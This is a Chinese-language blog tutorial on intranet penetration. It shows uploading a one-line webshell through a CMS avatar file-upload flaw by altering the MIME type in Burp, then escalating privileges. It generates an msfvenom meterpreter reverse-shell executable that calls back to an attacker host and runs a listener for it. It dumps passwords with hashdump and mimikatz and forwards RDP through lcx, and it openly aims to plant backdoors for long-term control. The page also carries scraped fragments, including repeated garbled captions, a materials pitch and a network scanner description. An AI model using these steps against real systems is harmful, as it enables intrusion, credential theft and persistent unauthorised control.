行业解决方案-渗透内网漏洞扫描-零基础信息安全自学路线

行业解决方案-渗透内网漏洞扫描-零基础信息安全自学路线

不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。

内网渗透思路

本次内网渗透的思路为:通过信息收集对网站进行分析,通过攻击外网服务器,从而获取外网服务器的权限,然后利用入侵成功的外网服务器作为跳板来攻击内网其他服务器,最后获得敏感数据(系统密码等),看情况安装后门木马或者后门软件,实现长期控制和获得敏感数据的方式。

还有一种内网渗透的思路为:通过社工等方法攻击企业办公网的电脑、办公网无线等,实现控制办公电脑,再用获得的办公网数据。

渗透过程详解

本次渗透过程将分为—->—->提权

访问某网站,该网站利用的是 v5系统建站,创建一个新的用户进行测试。

_渗透内网设备_渗透内网漏洞扫描

初步判断该网页模板为 v5建站系统,然后注册一个新的用户,方便我们利用 v5系统的文件上传漏洞

参考链接:blog.csdn.net/…

_渗透内网设备_渗透内网漏洞扫描

文件上传漏洞在会员头像处,所以先注册一个账号然后登录后上传我们的一句话木马

渗透内网设备_渗透内网漏洞扫描_

最开始的文件格式是0x0.png

通过burp代理拦截将tx后面的image/png换成image/php即可

渗透内网设备__渗透内网漏洞扫描

输入参数v=();验证成功

渗透内网漏洞扫描__渗透内网设备

验证上传成功后,打开菜刀软件输入上传的网站路径和参数(一句话木马的密码),可以连接服务器

在菜刀软件上可以进行数据库的提权,如mof提权、udf提权、启动项提权等

渗透内网设备_渗透内网漏洞扫描_

编写免杀木马

通过连接目标服务器,但是访问的数据有限,仅仅是站点的系统账户权限,访问的系统路径也有限,于是我们可以编写免杀木马来进行反弹shell木马su.exe

Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f exe >/root/Desktop/su.exe

渗透内网漏洞扫描_渗透内网设备_

利用刚刚连接菜刀的操作,在文件管理中上传我们需要的工具

渗透内网设备_渗透内网漏洞扫描_

进入攻击模块,配置参数

use exploit/multi/handlerSet payload/windows/x64/meterpreter/reverse_tcpSet lport 4444Set lhost 192.168.10.130run

渗透内网设备__渗透内网漏洞扫描

可以利用菜刀的虚拟终端模拟服务器点击免杀木马的操作,让木马生效

渗透内网漏洞扫描_渗透内网设备_

run执行监听

_渗透内网设备_渗透内网漏洞扫描

获取密码过程

hashdumpload mimikatzkerberos

渗透内网漏洞扫描_渗透内网设备_

注:如果的远程桌面操作是不允许连接到这台计算机,那么开启端口转发也是没用的

_渗透内网漏洞扫描_渗透内网设备

渗透内网设备_渗透内网漏洞扫描_

开启远程桌面

_渗透内网漏洞扫描_渗透内网设备

渗透内网设备_渗透内网漏洞扫描_

渗透内网设备__渗透内网漏洞扫描

思路一:利用模块执行远程连接

然后开启端口转发,-l(本地端口)-p(远程控制端口)-r(目标主机)

靶机3389端口转发发送到本地的5555端口

渗透内网漏洞扫描_渗透内网设备_

-u 用户名 -p 密码 127.0.0.1:5555 连接本地的5555端口开启远程桌面

_渗透内网漏洞扫描_渗透内网设备

利用开启远程桌面,需要利用lcx工具,现在shell模式下输入指令

靶机执行lcx.exe -slave 192.168.10.20 5555 192.168.10.10 3389

_渗透内网漏洞扫描_渗透内网设备

思路二:利用lcx工具执行远程连接

攻击机执行lcx.exe. - 5555 33891,接着打开mstsc连接127.0.0.1 :33891

渗透内网漏洞扫描_渗透内网设备_

_渗透内网漏洞扫描_渗透内网设备

以下为连接成功和监听数据的发送

渗透内网漏洞扫描_渗透内网设备_

渗透内网漏洞扫描__渗透内网设备

总结

不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。

网络安全学习路线图(思维导图)

网络安全学习路线图可以是一个有助于你规划学习进程的工具。你可以在思维导图上列出不同的主题和技能,然后按照逻辑顺序逐步学习和掌握它们。这可以帮助你更清晰地了解自己的学习进展和下一步计划。

1. 网络安全视频资料

2. 网络安全笔记/面试题

3. 网安电子书PDF资料

如果你向网安入门到进阶的全套资料,我都打包整理好了,需要学习的小伙伴可以V我找我拿~

学网络安全/学黑客,零基础资料整理来啦~~~

~

  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
#网络资产信息扫描渗透测试(特别是内网)中经常需要对目标进行网络资产收集,即对方服务器都有哪些IP,IP上开了哪些端口端口上运行着哪些服务,此脚本即为实现此过程,相比其他探测脚本有以下优点:1、轻巧简洁,只需python环境,无需安装额外外库。2、扫描完成后生成独立页面报告。 此脚本的大概流程为 ICMP存活探测-->端口开放探测-->端口指纹服务识别-->提取快照(若为WEB)-->生成结果报表 运行环境:python 2.6 + 参数说明 -h 必须输入的参数,支持ip(192.168.1.1),ip段(192.168.1),ip范围指定(192.168.1.1-192.168.1.254),ip列表文件(ip.ini),最多限制一次可扫描65535个IP。 -p 指定要扫描端口列表,多个端口使用,隔开 例如:22,23,80,3306。未指定即使用内置默认端口进行扫描(21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017) -m 指定线程数量 默认100线程 -t 指定HTTP请求超时时间,默认为10秒,端口扫描超时为值的1/2。 -n 不进行存活探测(ICMP)直接进行扫描。 结果报告保存在当前目录(扫描IP-时间戳.html)。 例子: python NAScan.py -h 10.111.1 python NAScan.py -h 192.168.1.1-192.168.2.111 python NAScan.py -h 10.111.1.22 -p 80,7001,8080 -m 200 -t 6 python NAScan.py -h ip.ini -p port.ini -n 服务识别在server_info.ini文件中配置 格式为:服务名|默认端口|正则 例 ftp|21|^220.*?ftp|^220- 正则为空时则使用端口进行匹配,否则以正则匹配结果为准。 项目地址 https://github.com/ywolf/ 欢迎大家反馈建议和BUG
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值